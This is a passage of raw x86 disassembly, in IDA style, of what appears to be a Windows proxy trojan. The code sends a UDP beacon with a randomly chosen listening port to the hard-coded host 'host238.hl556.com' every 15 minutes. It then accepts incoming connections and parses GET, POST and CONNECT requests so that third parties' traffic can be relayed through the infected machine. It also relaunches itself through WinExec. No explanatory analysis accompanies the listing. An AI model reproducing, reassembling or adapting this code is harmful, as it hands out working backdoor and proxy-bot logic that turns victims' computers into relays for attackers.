jge short loc_401A56
call sub_403A2A ; WSAGetLastError
cmp eax, 2734h
jnz short loc_401A5C
mov eax, 6
pop edi
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401A56: ; CODE XREF: sub_401A10+2D�j
jnz short loc_401A67
test edi, edi
jz short loc_401A67
loc_401A5C: ; CODE XREF: sub_401A10+39�j
mov eax, 8
pop edi
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401A67: ; CODE XREF: sub_401A10:loc_401A56�j
; sub_401A10+4A�j
mov [esi+10h], eax
pop edi
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
sub_401A10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401A80 proc near ; CODE XREF: seg001:00401FA8�p
; sub_402040+283�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_401A92
lea eax, [edi+7]
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_401A92: ; CODE XREF: sub_401A80+A�j
mov eax, [esi+8]
push eax
mov [esi+10h], edi
call sub_403A5A ; closesocket
test eax, eax
jge short loc_401AAD
mov eax, 8
pop edi
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401AAD: ; CODE XREF: sub_401A80+20�j
mov eax, [esi+1Ch]
cmp eax, edi
mov [esi+8], edi
mov [esi+0Ch], edi
jz short loc_401AC6
push eax
call sub_40405A
add esp, 4
mov [esi+1Ch], edi
loc_401AC6: ; CODE XREF: sub_401A80+38�j
mov eax, [esi+20h]
cmp eax, edi
jz short loc_401AD9
push eax
call sub_40405A
add esp, 4
mov [esi+20h], edi
loc_401AD9: ; CODE XREF: sub_401A80+4B�j
push 3Ch
push edi
push esi
call sub_403FE0
add esp, 0Ch
pop edi
xor eax, eax
pop esi
retn
sub_401A80 endp
; ---------------------------------------------------------------------------
align 10h
push ecx
push esi
mov esi, [esp+0Ch]
test esi, esi
mov dword ptr [esp+4], 1
jnz short loc_401B08
lea eax, [esi+7]
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401B08: ; CODE XREF: seg001:00401B00�j
push 11h
push 2
push 2
mov dword ptr [esi+10h], 0
call sub_403A3C ; socket
test eax, eax
mov [esi+8], eax
jge short loc_401B2C
mov eax, 3
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401B2C: ; CODE XREF: seg001:00401B1F�j
mov eax, [esp+10h]
push edi
lea edi, [esi+28h]
push eax
mov word ptr [edi], 2
mov dword ptr [esi+2Ch], 0
call sub_403A24 ; htons
mov edx, [esi+8]
push 4
lea ecx, [esp+0Ch]
push ecx
push 4
push 0FFFFh
push edx
mov [esi+2Ah], ax
call sub_403A1E ; setsockopt
mov eax, [esi+8]
push 10h
push edi
push eax
mov dword ptr [esp+14h], 1
call sub_403A18 ; bind
test eax, eax
pop edi
jge short loc_401B85
mov eax, 4
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401B85: ; CODE XREF: seg001:00401B78�j
mov edx, [esi+8]
push 4
lea ecx, [esp+8]
push ecx
push 100h
push 0FFFFh
push edx
mov dword ptr [esi+0Ch], 0
mov dword ptr [esp+18h], 1
call sub_403A1E ; setsockopt
xor eax, eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401BC0 proc near ; CODE XREF: sub_401E40+2F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_401BCE
lea eax, [esi+7]
pop esi
retn
; ---------------------------------------------------------------------------
loc_401BCE: ; CODE XREF: sub_401BC0+7�j
push 11h
push 2
push 2
mov dword ptr [esi+10h], 0
call sub_403A3C ; socket
test eax, eax
mov [esi+8], eax
jge short loc_401BF1
mov eax, 3
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401BF1: ; CODE XREF: sub_401BC0+25�j
push edi
mov edi, [esp+8+arg_4]
push edi
call sub_403A06 ; inet_addr
test eax, eax
jz short loc_401C16
push edi
call sub_403A06 ; inet_addr
cmp eax, 0FFFFFFFFh
jz short loc_401C16
push edi
call sub_403A06 ; inet_addr
mov [esi+2Ch], eax
jmp short loc_401C42
; ---------------------------------------------------------------------------
loc_401C16: ; CODE XREF: sub_401BC0+3E�j
; sub_401BC0+49�j
push edi
call sub_403A00 ; gethostbyname
test eax, eax
jnz short loc_401C2B
mov eax, 1
pop edi
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401C2B: ; CODE XREF: sub_401BC0+5E�j
movsx ecx, word ptr [eax+0Ah]
mov edx, [eax+0Ch]
mov eax, [edx]
push ecx
push eax
lea ecx, [esi+2Ch]
push ecx
call sub_403BE0
add esp, 0Ch
loc_401C42: ; CODE XREF: sub_401BC0+54�j
mov edx, [esp+8+arg_8]
push edx
mov word ptr [esi+28h], 2
call sub_403A24 ; htons
mov [esi+2Ah], ax
pop edi
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
sub_401BC0 endp
; ---------------------------------------------------------------------------
align 10h
push esi
mov esi, [esp+0Ch]
test esi, esi
jnz short loc_401C7E
lea eax, [esi+7]
pop esi
retn
; ---------------------------------------------------------------------------
loc_401C7E: ; CODE XREF: seg001:00401C77�j
mov eax, [esp+8]
push edi
mov edi, [esp+14h]
mov dword ptr [esi+10h], 0
mov ecx, [eax+8]
push edi
mov [esi+8], ecx
call sub_403A06 ; inet_addr
test eax, eax
jz short loc_401CB4
push edi
call sub_403A06 ; inet_addr
cmp eax, 0FFFFFFFFh
jz short loc_401CB4
push edi
call sub_403A06 ; inet_addr
mov [esi+2Ch], eax
jmp short loc_401CE0
; ---------------------------------------------------------------------------
loc_401CB4: ; CODE XREF: seg001:00401C9C�j
; seg001:00401CA7�j
push edi
call sub_403A00 ; gethostbyname
test eax, eax
jnz short loc_401CC9
mov eax, 1
pop edi
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401CC9: ; CODE XREF: seg001:00401CBC�j
movsx edx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
mov ecx, [eax]
push edx
push ecx
lea edx, [esi+2Ch]
push edx
call sub_403BE0
add esp, 0Ch
loc_401CE0: ; CODE XREF: seg001:00401CB2�j
mov eax, [esp+18h]
push eax
mov word ptr [esi+28h], 2
call sub_403A24 ; htons
mov [esi+2Ah], ax
pop edi
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
push esi
mov esi, [esp+8]
test esi, esi
jnz short loc_401D0E
lea eax, [esi+7]
pop esi
retn
; ---------------------------------------------------------------------------
loc_401D0E: ; CODE XREF: seg001:00401D07�j
mov dword ptr [esi+10h], 0
call sub_403F8F
mov ecx, [esp+10h]
mov edx, [esp+0Ch]
push 10h
mov dword ptr [eax], 0
lea eax, [esi+28h]
push eax
mov eax, [esi+8]
push 0
push ecx
push edx
push eax
call sub_403A60 ; sendto
test eax, eax
jg short loc_401D5F
call sub_403A2A ; WSAGetLastError
cmp eax, 2734h
jnz short loc_401D55
mov eax, 6
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401D55: ; CODE XREF: seg001:00401D49�j
mov eax, 8
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401D5F: ; CODE XREF: seg001:00401D3D�j
mov [esi+10h], eax
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
push ecx
push ebx
mov ebx, [esp+0Ch]
test ebx, ebx
mov dword ptr [esp+4], 10h
jnz short loc_401D88
lea eax, [ebx+7]
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401D88: ; CODE XREF: seg001:00401D80�j
push esi
push edi
mov dword ptr [ebx+10h], 0
call sub_403F8F
mov edx, [esp+20h]
mov dword ptr [eax], 0
mov eax, [esp+18h]
mov edi, eax
mov ecx, 0Fh
mov esi, ebx
rep movsd
lea ecx, [esp+0Ch]
push ecx
mov ecx, [ebx+8]
add eax, 28h
push eax
mov eax, [esp+24h]
push 0
push edx
push eax
push ecx
call sub_403A66 ; recvfrom
test eax, eax
pop edi
pop esi
jge short loc_401DF1
call sub_403A2A ; WSAGetLastError
cmp eax, 2734h
jnz short loc_401DE6
mov eax, 6
mov [ebx+0Ch], eax
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401DE6: ; CODE XREF: seg001:00401DD9�j
mov eax, 8
mov [ebx+0Ch], eax
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401DF1: ; CODE XREF: seg001:00401DCD�j
mov [ebx+10h], eax
mov dword ptr [ebx+0Ch], 0
xor eax, eax
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
push esi
mov esi, [esp+8]
test esi, esi
jnz short loc_401E0E
lea eax, [esi+7]
pop esi
retn
; ---------------------------------------------------------------------------
loc_401E0E: ; CODE XREF: seg001:00401E07�j
mov eax, [esi+8]
push eax
mov dword ptr [esi+10h], 0
call sub_403A5A ; closesocket
test eax, eax
jge short loc_401E2C
mov eax, 8
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401E2C: ; CODE XREF: seg001:00401E20�j
mov dword ptr [esi+8], 0
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401E40 proc near ; DATA XREF: sub_402040+D7�o
var_140 = byte ptr -140h
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_118 = byte ptr -118h
var_104 = byte ptr -104h
var_4 = dword ptr -4
sub esp, 144h
mov eax, dword_410440
xor eax, esp
mov [esp+144h+var_4], eax
push ebx
push esi
push edi
mov edi, dword_40D0EC
xor ebx, ebx
nop
loc_401E60: ; CODE XREF: sub_401E40+112�j
; sub_401E40+126�j
push 800Eh
lea eax, [esp+154h+var_140]
push offset aHost238_hl556_ ; "host238.hl556.com"
push eax
call sub_401BC0
add esp, 0Ch
test eax, eax
jnz loc_401F5F
movzx ecx, word_411E7C
push ecx
lea edx, [esp+154h+var_104]
push offset aD ; "%d"
push edx
call sub_4041B4
lea eax, [esp+15Ch+var_104]
add esp, 0Ch
xor edx, edx
lea esi, [eax+1]
loc_401EA2: ; CODE XREF: sub_401E40+69�j
mov cl, [eax]
add eax, 1
cmp cl, bl
jnz short loc_401EA2
sub eax, esi
jz short loc_401ED3
nop
loc_401EB0: ; CODE XREF: sub_401E40+91�j
mov al, [esp+edx+150h+var_104]
add al, al
mov [esp+edx+150h+var_104], al
lea eax, [esp+150h+var_104]
add edx, 1
lea esi, [eax+1]
loc_401EC4: ; CODE XREF: sub_401E40+8B�j
mov cl, [eax]
add eax, 1
cmp cl, bl
jnz short loc_401EC4
sub eax, esi
cmp edx, eax
jb short loc_401EB0
loc_401ED3: ; CODE XREF: sub_401E40+6D�j
lea eax, [esp+150h+var_104]
lea edx, [eax+1]
lea ebx, [ebx+0]
loc_401EE0: ; CODE XREF: sub_401E40+A7�j
mov cl, [eax]
add eax, 1
cmp cl, bl
jnz short loc_401EE0
sub eax, edx
mov esi, eax
mov [esp+150h+var_130], ebx
call sub_403F8F
push 10h
lea ecx, [esp+154h+var_118]
push ecx
push ebx
push esi
lea edx, [esp+160h+var_104]
mov [eax], ebx
mov eax, [esp+160h+var_138]
push edx
push eax
call sub_403A60 ; sendto
test eax, eax
jg short loc_401F2D
call sub_403A2A ; WSAGetLastError
xor ecx, ecx
cmp eax, 2734h
setnz cl
lea ecx, [ecx+ecx+6]
mov [esp+150h+var_134], ecx
jmp short loc_401F31
; ---------------------------------------------------------------------------
loc_401F2D: ; CODE XREF: sub_401E40+D2�j
mov [esp+150h+var_134], ebx
loc_401F31: ; CODE XREF: sub_401E40+EB�j
mov edx, [esp+150h+var_138]
push edx
mov [esp+154h+var_130], ebx
call sub_403A5A ; closesocket
test eax, eax
jge short loc_401F57
push 0DBBA0h
mov [esp+154h+var_134], 8
call edi ; Sleep
jmp loc_401E60
; ---------------------------------------------------------------------------
loc_401F57: ; CODE XREF: sub_401E40+101�j
mov [esp+150h+var_138], ebx
mov [esp+150h+var_134], ebx
loc_401F5F: ; CODE XREF: sub_401E40+39�j
push 0DBBA0h
call edi ; Sleep
jmp loc_401E60
sub_401E40 endp
; ---------------------------------------------------------------------------
align 10h
loc_401F70: ; CODE XREF: seg001:00402E28�p
sub esp, 108h
mov eax, dword_410440
xor eax, esp
mov [esp+104h], eax
push ebx
push esi
push edi
push 100h
lea eax, [esp+10h]
push eax
xor ebx, ebx
push ebx
call dword_40D0E0 ; GetModuleFileNameA
mov esi, offset dword_411EA0
lea edi, [ebx+32h]
loc_401FA2: ; CODE XREF: seg001:00401FB6�j
cmp [esi+8], ebx
jle short loc_401FB0
push esi
call sub_401A80
add esp, 4
loc_401FB0: ; CODE XREF: seg001:00401FA5�j
add esi, 3Ch
sub edi, 1
jnz short loc_401FA2
mov ecx, dword_411E48
push ecx
mov dword_411E50, ebx
call sub_403A5A ; closesocket
test eax, eax
jge short loc_401FDA
mov dword_411E4C, 8
jmp short loc_402020
; ---------------------------------------------------------------------------
loc_401FDA: ; CODE XREF: seg001:00401FCC�j
mov eax, dword_411E5C
cmp eax, ebx
mov dword_411E48, ebx
mov dword_411E4C, ebx
jz short loc_401FFE
push eax
call sub_40405A
add esp, 4
mov dword_411E5C, ebx
loc_401FFE: ; CODE XREF: seg001:00401FED�j
mov eax, dword_411E60
cmp eax, ebx
jz short loc_402010
push eax
call sub_40405A
add esp, 4
loc_402010: ; CODE XREF: seg001:00402005�j
push 3Ch
push ebx
push offset dword_411E40
call sub_403FE0
add esp, 0Ch
loc_402020: ; CODE XREF: seg001:00401FD8�j
push ebx
lea edx, [esp+10h]
push edx
call dword_40D0E4 ; WinExec
push ebx
call sub_4044BF
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 0Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=1F50h
sub_402040 proc near ; CODE XREF: seg001:004037EF�j
; seg001:0040389B�p
var_21A4 = dword ptr -21A4h
var_21A0 = dword ptr -21A0h
var_20A0 = dword ptr -20A0h
var_209C = dword ptr -209Ch
var_1F9C = byte ptr -1F9Ch
var_1F98 = dword ptr -1F98h
var_1F94 = dword ptr -1F94h
var_1F90 = dword ptr -1F90h
var_1F8C = dword ptr -1F8Ch
var_1F88 = dword ptr -1F88h
var_1F84 = dword ptr -1F84h
var_1F80 = dword ptr -1F80h
var_1F7C = dword ptr -1F7Ch
var_1F78 = dword ptr -1F78h
var_1F74 = dword ptr -1F74h
var_1F70 = dword ptr -1F70h
var_1F6C = dword ptr -1F6Ch
var_1F68 = dword ptr -1F68h
var_1F60 = byte ptr -1F60h
var_1F58 = dword ptr -1F58h
var_1F54 = dword ptr -1F54h
var_1F50 = byte ptr -1F50h
var_1DC0 = byte ptr -1DC0h
var_DC0 = byte ptr -0DC0h
var_CC1 = byte ptr -0CC1h
var_CC0 = dword ptr -0CC0h
var_CBC = dword ptr -0CBCh
var_CB8 = byte ptr -0CB8h
var_CB7 = byte ptr -0CB7h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-1F50h]
mov eax, 1F50h
call sub_4047F0
push 0FFFFFFFEh
push offset dword_40E490
push offset sub_404650
mov eax, large fs:0
push eax
sub esp, 244h
mov eax, dword_410440
xor [ebp+1F50h+var_1F58], eax
xor eax, ebp
mov [ebp+1F50h+var_4], eax
push ebx
push esi
push edi
push eax
lea eax, [ebp+1F50h+var_1F60]
mov large fs:0, eax
mov [ebp+1F50h+var_1F68], esp
mov [ebp+1F50h+var_1F54], 0
lea eax, [ebp+1F50h+var_1F50]
push eax
push 202h
call sub_403A6C ; WSAStartup
push 0
call sub_4067A5
add esp, 4
mov esi, eax
call dword_40D0D8 ; GetCurrentProcessId
imul esi, eax
push esi
call sub_40461A
push 3Ch
push 0
push offset dword_411E40
call sub_403FE0
push 0BB8h
push 0
push offset dword_411EA0
call sub_403FE0
add esp, 1Ch
lea ecx, [ecx+0]
loc_4020E0: ; CODE XREF: sub_402040+CD�j
call sub_404627
cdq
mov ecx, 0FBFDh
idiv ecx
add edx, 401h
mov word_411E7C, dx
movzx edx, dx
push edx
push offset dword_411E40
call sub_401710
add esp, 8
test eax, eax
jnz short loc_4020E0
lea eax, [ebp+1F50h+var_1F9C]
push eax
push 0
push 0
push offset sub_401E40
push 0
push 0
call dword_40D0DC ; CreateThread
loc_402126: ; CODE XREF: sub_402040+233�j
xor edx, edx
mov [ebp+1F50h+var_20A0], edx
xor esi, esi
mov [ebp+1F50h+var_21A4], esi
mov eax, dword_411E48
mov [ebp+1F50h+var_209C], eax
mov edi, 1
mov [ebp+1F50h+var_20A0], edi
mov ebx, eax
mov [ebp+1F50h+var_1F98], ebx
loc_402151: ; CODE XREF: sub_402040+179�j
mov [ebp+1F50h+var_1F6C], edx
cmp edx, 32h
jnb short loc_4021BB
mov eax, edx
shl eax, 4
sub eax, edx
add eax, eax
add eax, eax
mov ecx, dword_411EA8[eax]
test ecx, ecx
jle short loc_4021B6
cmp edi, 40h
jnb short loc_402189
mov [ebp+edi*4+1F50h+var_209C], ecx
mov edi, [ebp+1F50h+var_20A0]
add edi, 1
mov [ebp+1F50h+var_20A0], edi
loc_402189: ; CODE XREF: sub_402040+131�j
cmp dword_411EBC[eax], 0
jz short loc_4021AD
cmp esi, 40h
jnb short loc_4021AD
mov [ebp+esi*4+1F50h+var_21A0], ecx
mov esi, [ebp+1F50h+var_21A4]
add esi, 1
mov [ebp+1F50h+var_21A4], esi
loc_4021AD: ; CODE XREF: sub_402040+150�j
; sub_402040+155�j
cmp ecx, ebx
jbe short loc_4021B6
mov ebx, ecx
mov [ebp+1F50h+var_1F98], ebx
loc_4021B6: ; CODE XREF: sub_402040+12C�j
; sub_402040+16F�j
add edx, 1
jmp short loc_402151
; ---------------------------------------------------------------------------
loc_4021BB: ; CODE XREF: sub_402040+117�j
xor eax, eax
mov [ebp+1F50h+var_1F94], eax
mov [ebp+1F50h+var_1F90], eax
mov [ebp+1F50h+var_1F94], 2
mov [ebp+1F50h+var_1F90], eax
lea ecx, [ebp+1F50h+var_1F94]
push ecx
push eax
lea edx, [ebp+1F50h+var_21A4]
push edx
lea eax, [ebp+1F50h+var_20A0]
push eax
add ebx, 1
push ebx
call sub_403A12 ; select
push 0BB9h
push 0
lea ecx, [ebp+1F50h+var_CC0]
push ecx
call sub_403FE0
add esp, 0Ch
lea edx, [ebp+1F50h+var_20A0]
push edx
mov eax, dword_411E48
push eax
call sub_403A0C ; __WSAFDIsSet
test eax, eax
jz short loc_402265
xor ebx, ebx
loc_402217: ; CODE XREF: sub_402040+223�j
mov [ebp+1F50h+var_1F6C], ebx
cmp ebx, 32h
jnb short loc_402265
mov esi, ebx
shl esi, 4
sub esi, ebx
add esi, esi
add esi, esi
cmp dword_411EA8[esi], 0
jnz short loc_402260
lea edi, dword_411EA0[esi]
push edi
push offset dword_411E40
call sub_4017C0
add esp, 8
test eax, eax
jnz short loc_402265
push eax
call sub_4067A5
add esp, 4
mov dword_411EB8[esi], eax
mov dword ptr [edi], 1
loc_402260: ; CODE XREF: sub_402040+1F1�j
add ebx, 1
jmp short loc_402217
; ---------------------------------------------------------------------------
loc_402265: ; CODE XREF: sub_402040+1D3�j
; sub_402040+1DD�j ...
xor ebx, ebx
mov [ebp+1F50h+var_1F6C], ebx
lea ebx, [ebx+0]
loc_402270: ; CODE XREF: sub_402040+354�j
; sub_402040+3B1�j ...
cmp ebx, 32h
jnb loc_402126
mov esi, ebx
shl esi, 4
sub esi, ebx
add esi, esi
add esi, esi
cmp dword_411EA8[esi], 0
jz loc_402E18
mov [ebp+1F50h+var_1F7C], 0
push 0
call sub_4067A5
add esp, 4
sub eax, dword_411EB8[esi]
cmp eax, 1Eh
jb short loc_4022D4
lea edi, dword_411EA0[esi]
cmp dword ptr [edi], 3
jz short loc_4022D4
mov eax, dword_411ED8[esi]
test eax, eax
jz short loc_4022CB
push eax
call sub_401A80
add esp, 4
loc_4022CB: ; CODE XREF: sub_402040+280�j
push edi
call sub_401A80
add esp, 4
loc_4022D4: ; CODE XREF: sub_402040+26B�j
; sub_402040+276�j
push 0
call sub_4067A5
add esp, 4
sub eax, dword_411EB8[esi]
cmp eax, 78h
jb short loc_40230B
mov eax, dword_411ED8[esi]
test eax, eax
jz short loc_4022FC
push eax
call sub_401A80
add esp, 4
loc_4022FC: ; CODE XREF: sub_402040+2B1�j
lea ecx, dword_411EA0[esi]
push ecx
call sub_401A80
add esp, 4
loc_40230B: ; CODE XREF: sub_402040+2A7�j
cmp dword_411EBC[esi], 0
jz short loc_402341
lea edx, [ebp+1F50h+var_21A4]
push edx
mov eax, dword_411EA8[esi]
push eax
call sub_403A0C ; __WSAFDIsSet
test eax, eax
jz short loc_402341
push 0
push offset byte_4113C5
lea ecx, dword_411EA0[esi]
push ecx
call sub_401840
add esp, 0Ch
loc_402341: ; CODE XREF: sub_402040+2D2�j
; sub_402040+2E9�j
lea edi, dword_411EA0[esi]
cmp dword ptr [edi], 1
jnz loc_402A4B
lea edx, [ebp+1F50h+var_20A0]
push edx
mov eax, dword_411EA8[esi]
push eax
call sub_403A0C ; __WSAFDIsSet
test eax, eax
jz loc_402A4B
push 0BB8h
lea ecx, [ebp+1F50h+var_CC0]
push ecx
push edi
call sub_401A10
add esp, 0Ch
test eax, eax
jz short loc_402399
push edi
call sub_401A80
add esp, 4
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_402399: ; CODE XREF: sub_402040+342�j
mov al, byte ptr [ebp+1F50h+var_CC0]
cmp al, 47h
jz short loc_4023AB
cmp al, 50h
jnz loc_402667
loc_4023AB: ; CODE XREF: sub_402040+361�j
xor ebx, ebx
mov [ebp+1F50h+var_1F84], ebx
mov [ebp+1F50h+var_1F8C], ebx
lea esi, [ebp+1F50h+var_CC0]
loc_4023B9: ; CODE XREF: sub_402040+389�j
mov [ebp+1F50h+var_1F78], esi
mov al, [esi]
test al, al
jz short loc_4023CB
cmp al, 20h
jz short loc_4023CB
add esi, 1
jmp short loc_4023B9
; ---------------------------------------------------------------------------
loc_4023CB: ; CODE XREF: sub_402040+380�j
; sub_402040+384�j
cmp byte ptr [esi], 20h
jz short loc_4023F6
loc_4023D0: ; CODE XREF: sub_402040+598�j
; sub_402040+5F4�j
mov eax, [ebp+1F50h+var_1F6C]
mov edx, eax
shl edx, 4
sub edx, eax
loc_4023DA: ; CODE XREF: sub_402040+832�j
; sub_402040+88A�j
lea eax, ds:411EA0h[edx*4]
push eax
call sub_401A80
add esp, 4
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_4023F6: ; CODE XREF: sub_402040+38E�j
add esi, 1
mov [ebp+1F50h+var_1F78], esi
cmp byte ptr [esi], 0
jnz short loc_402427
loc_402401: ; CODE XREF: sub_402040+421�j
; sub_402040+42E�j
mov eax, [ebp+1F50h+var_1F6C]
mov ecx, eax
shl ecx, 4
sub ecx, eax
lea edx, ds:411EA0h[ecx*4]
push edx
call sub_401A80
add esp, 4
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_402427: ; CODE XREF: sub_402040+3BF�j
push 7
push offset aHttp ; "http://"
push esi
call sub_40455C
add esp, 0Ch
test eax, eax
jnz short loc_402441
add esi, 7
mov [ebp+1F50h+var_1F78], esi
loc_402441: ; CODE XREF: sub_402040+3F9�j
mov edi, esi
loc_402443: ; CODE XREF: sub_402040+417�j
mov al, [esi]
test al, al
jz short loc_402459
cmp al, 2Fh
jz short loc_402459
cmp al, 20h
jz short loc_402459
add esi, 1
mov [ebp+1F50h+var_1F78], esi
jmp short loc_402443
; ---------------------------------------------------------------------------
loc_402459: ; CODE XREF: sub_402040+407�j
; sub_402040+40B�j ...
mov al, [esi]
cmp al, 20h
jz short loc_402463
cmp al, 2Fh
jnz short loc_402401
loc_402463: ; CODE XREF: sub_402040+41D�j
mov [ebp+1F50h+var_1F88], esi
sub esi, edi
cmp esi, 0FFh
ja short loc_402401
push 100h
push 0
lea eax, [ebp+1F50h+var_DC0]
push eax
call sub_403FE0
push esi
push edi
lea ecx, [ebp+1F50h+var_DC0]
push ecx
call sub_403BE0
add esp, 18h
lea esi, [ebp+1F50h+var_DC0]
loc_40249A: ; CODE XREF: sub_402040+46A�j
mov [ebp+1F50h+var_1F78], esi
mov al, [esi]
test al, al
jz short loc_4024AC
cmp al, 3Ah
jz short loc_4024AC
add esi, 1
jmp short loc_40249A
; ---------------------------------------------------------------------------
loc_4024AC: ; CODE XREF: sub_402040+461�j
; sub_402040+465�j
cmp byte ptr [esi], 3Ah
jnz short loc_4024C5
lea edx, [esi+1]
push edx
call sub_40454B
add esp, 4
mov ebx, eax
mov [ebp+1F50h+var_1F84], eax
mov byte ptr [esi], 0
loc_4024C5: ; CODE XREF: sub_402040+46F�j
test ebx, ebx
jnz short loc_4024D0
mov [ebp+1F50h+var_1F84], 50h
loc_4024D0: ; CODE XREF: sub_402040+487�j
push 1000h
push 0
lea eax, [ebp+1F50h+var_1DC0]
push eax
call sub_403FE0
add esp, 0Ch
lea edi, [ebp+1F50h+var_CC0]
loc_4024EC: ; CODE XREF: sub_402040+4D8�j
mov [ebp+1F50h+var_1F78], edi
mov dl, [edi]
test dl, dl
jz short loc_40251A
cmp dl, 20h
jz short loc_40251A
lea eax, [ebp+1F50h+var_1DC0]
lea esi, [eax+1]
loc_402503: ; CODE XREF: sub_402040+4CA�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402503
sub eax, esi
mov [ebp+eax+1F50h+var_1DC0], dl
add edi, 1
jmp short loc_4024EC
; ---------------------------------------------------------------------------
loc_40251A: ; CODE XREF: sub_402040+4B3�j
; sub_402040+4B8�j
lea eax, [ebp+1F50h+var_1DC0]
lea edx, [eax+1]
loc_402523: ; CODE XREF: sub_402040+4EA�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402523
sub eax, edx
mov [ebp+eax+1F50h+var_1DC0], 20h
mov eax, [ebp+1F50h+var_1F88]
mov ecx, eax
jmp short loc_402540
; ---------------------------------------------------------------------------
align 10h
loc_402540: ; CODE XREF: sub_402040+4FB�j
; sub_402040+507�j
mov dl, [eax]
add eax, 1
test dl, dl
jnz short loc_402540
sub eax, ecx
mov esi, ecx
lea edi, [ebp+1F50h+var_1DC0]
add edi, 0FFFFFFFFh
loc_402556: ; CODE XREF: sub_402040+51E�j
mov cl, [edi+1]
add edi, 1
test cl, cl
jnz short loc_402556
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor ebx, ebx
mov [ebp+1F50h+var_1F8C], ebx
xor eax, eax
loc_402575: ; CODE XREF: sub_402040+6A9�j
mov [ebp+1F50h+var_1F70], eax
cmp eax, 32h
jnb loc_402632
mov esi, eax
shl esi, 4
sub esi, eax
add esi, esi
add esi, esi
cmp dword_411EA8[esi], 0
jnz loc_4026E6
lea edi, dword_411EA0[esi]
mov ecx, [ebp+1F50h+var_1F84]
push ecx
lea edx, [ebp+1F50h+var_DC0]
push edx
push edi
call sub_4014F0
add esp, 0Ch
test eax, eax
jz short loc_4025DD
mov eax, [ebp+1F50h+var_1F6C]
mov ecx, eax
shl ecx, 4
sub ecx, eax
lea edx, ds:411EA0h[ecx*4]
push edx
call sub_401A80
add esp, 4
mov [ebp+1F50h+var_1F8C], 1
jmp loc_4023D0
; ---------------------------------------------------------------------------
loc_4025DD: ; CODE XREF: sub_402040+575�j
mov dword ptr [edi], 2
lea eax, [ebp+1F50h+var_1DC0]
push eax
call sub_403A78
mov dword_411EC0[esi], eax
push 0
call sub_4067A5
mov dword_411EB4[esi], eax
push 0
call sub_4067A5
add esp, 0Ch
mov dword_411EB8[esi], eax
mov ecx, [ebp+1F50h+var_1F6C]
mov eax, ecx
shl eax, 4
sub eax, ecx
add eax, eax
add eax, eax
lea ecx, dword_411EA0[eax]
mov dword_411ED8[esi], ecx
mov dword_411ED8[eax], edi
loc_402632: ; CODE XREF: sub_402040+53B�j
test ebx, ebx
jnz loc_4023D0
mov eax, [ebp+1F50h+var_1F6C]
mov esi, eax
shl esi, 4
sub esi, eax
add esi, esi
add esi, esi
lea edi, dword_411EA0[esi]
mov dword ptr [edi], 29Ah
mov dword_411EA4[esi], 6
mov al, byte ptr [ebp+1F50h+var_CC0]
mov ebx, [ebp+1F50h+var_1F6C]
loc_402667: ; CODE XREF: sub_402040+365�j
cmp al, 43h
jnz loc_402904
nop
loc_402670: ; CODE XREF: sub_402040+6A4�j
lea eax, [ebp+1F50h+var_CC0]
lea edx, [eax+1]
lea esp, [esp+0]
loc_402680: ; CODE XREF: sub_402040+647�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402680
sub eax, edx
jz short loc_4026EE
lea eax, [ebp+1F50h+var_CC0]
lea edx, [eax+1]
loc_402696: ; CODE XREF: sub_402040+65D�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402696
sub eax, edx
cmp [ebp+eax+1F50h+var_CC1], 0Ah
